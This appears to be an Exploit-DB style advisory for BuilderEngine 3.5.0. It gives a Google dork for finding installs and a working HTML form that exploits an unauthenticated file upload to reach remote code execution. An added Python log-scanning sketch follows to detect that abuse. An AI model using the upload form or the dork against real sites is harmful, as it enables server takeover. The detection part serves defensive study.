<!--
# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
# Date: 18/09/2016
# Exploit Author: metanubix
# Vendor Homepage: http://builderengine.org/
# Software Link: http://builderengine.org/page-cms-download.html
# Version: 3.5.0
# Tested on: Kali Linux 2.0 64 bit
# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"

1) Unauthenticated Unrestricted File Upload:

    POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/

    Vulnerable Parameter: files[]

    We can upload test.php and reach the file via the following link:
    /files/test.php
-->
<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
    <input type="file" name="files[]" />
    <input type="submit" value="send" />
</form>
</body>
</html>
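
Detection sketch for the upload path described above, as an added example that is not part of the original exploit file: it scans web server access logs for POSTs to the jquery-file-upload endpoint and for script files requested from /files/. The combined log format, the list of script extensions, and the sample log lines are assumptions constructed for illustration.

```python
import re

# Paths taken from the advisory above.
UPLOAD_PATH = "/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
FILES_PREFIX = "/files/"
# Assumption: extensions a PHP-enabled server may execute.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Common/combined log format: ip - user [time] "METHOD target PROTO" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [18/Sep/2016:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120
203.0.113.9 - - [18/Sep/2016:10:02:13 +0000] "POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ HTTP/1.1" 200 312
203.0.113.9 - - [18/Sep/2016:10:02:20 +0000] "GET /files/test.php HTTP/1.1" 200 17
198.51.100.7 - - [18/Sep/2016:10:03:40 +0000] "GET /files/logo.png HTTP/1.1" 200 20480
198.51.100.8 - - [18/Sep/2016:10:04:02 +0000] "GET /files/TEST.PHP?x=1 HTTP/1.1" 404 199
"""

def find_upload_abuse(log_text):
    """Return (kind, ip, time, path, status) tuples for suspicious requests."""
    findings, uploaders = [], set()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, when, method, target, status = m.groups()
        path = target.split("?", 1)[0]  # ignore the query string
        if method == "POST" and path.startswith(UPLOAD_PATH):
            uploaders.add(ip)
            findings.append(("upload", ip, when, path, int(status)))
        elif path.startswith(FILES_PREFIX) and SCRIPT_EXT.search(path):
            # Script requested from the upload directory; higher severity when
            # it succeeded and the same client posted an upload earlier.
            hit = ip in uploaders and status == "200"
            kind = "script-after-upload" if hit else "script-request"
            findings.append((kind, ip, when, path, int(status)))
    return findings

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Any "upload" finding from an unauthenticated client, or any script file present under /files/, is worth triage on a BuilderEngine 3.5.0 install.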